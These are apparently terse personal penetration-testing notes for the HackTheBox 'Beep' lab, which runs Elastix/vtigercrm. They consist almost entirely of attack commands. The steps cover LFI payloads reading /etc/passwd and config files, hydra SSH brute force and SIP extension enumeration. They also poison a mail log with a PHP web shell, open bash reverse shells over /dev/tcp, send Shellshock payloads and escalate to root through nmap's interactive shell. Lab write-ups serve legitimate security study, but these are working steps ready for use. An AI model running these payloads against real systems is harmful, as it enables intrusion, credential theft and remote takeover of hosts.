searchsploit elastix
searchsploit -m 37637 ..copy LFI
https://$IP/vtigercrm/graph.php?current_language
=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
=../../../../../../../..//etc/passwd%00&module=Accounts&action
Ignore users with nologin
vim > :g/nologin/d
Fix formatting:
tr '#' '\n' < input.txt > output.txt
grep -i -E 'user|pass|host|name' output.txt
hydra -L users.txt -P pass.txt ssh://$IP
Passwords found here.. could be used as 'root' :)
(beep htb)
https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
?module_name=english.php HTTP/1.1
?module_name=../../../../../../../../etc/passwd%00
?module_name=../../../../../../../../proc/self/status%00
?module_name=../../../../../../../../var/mail/askerisk%00
View Page Source!
Found: uid:100:asterisk, passwd, mail-read
> svmap 10.129.113.87 -vv
+--------------------+---------------------+-------------+
| SIP Device | User Agent | Fingerprint |
+====================+=====================+=============+
| 10.129.113.87:5060 | FPBX-2.8.1(1.8.7.0) | disabled |
+--------------------+---------------------+-------------+
> svwar -h
> svware $IP
> svwar -D -m INVITE $IP
> svwar -D -m INVITE $IP -e100-300 --force
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233 | reqauth |
+-----------+----------------+
searchsploit -m 18650
vim 18650
lhost = $MyIP
rhost = $IP
extension='1000' ..default extension
extension='238' ..found with svware
url = 'https://....'
urllib.urlopen(url) ..original
print(url) ..to troubleshoot
nc -nvlp 4444
whoami
asterisk
sudo nmap --interactive
nmap> !sh
id ..root
-------------
smtp:25
telnet $IP
EHLO mutatedknutz.beep.localdomain ..extended hello
VRFY hacked@localhost ..rejected
VRFY asterisk@localhost ..connect!
mail from:hacked@hacked.com
rcpt to:askerisk@localhost
data
Subject:Testing!
Hello ..test #1
<?php echo "Php success"; ?> ..test #2
<?php echo system($_REQUEST['command']); ?> ..test #3
.
quit
-------------
Use LFI to pull mail/file:
https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
?module_name=../../../../../../../../var/mail/askerisk%00
&command=whoami HTTP/1.1
&command=hostname HTTP/1.1
&command=bash -i >& /dev/tcp/10.x.x.x/5151 0>&1 HTTP/1.1
Update as: URL Encoded (with burp)
nc -nvlp 5151
whoami
asterisk !!
searchsploit vtigercrm
msf: vtiger_soap_upload
() { :;}; echo; /usr/bin/wget https://$IP ..test
() { :;}; bash -i >& /dev/tcp/$IP/443 0>&1 ..reverse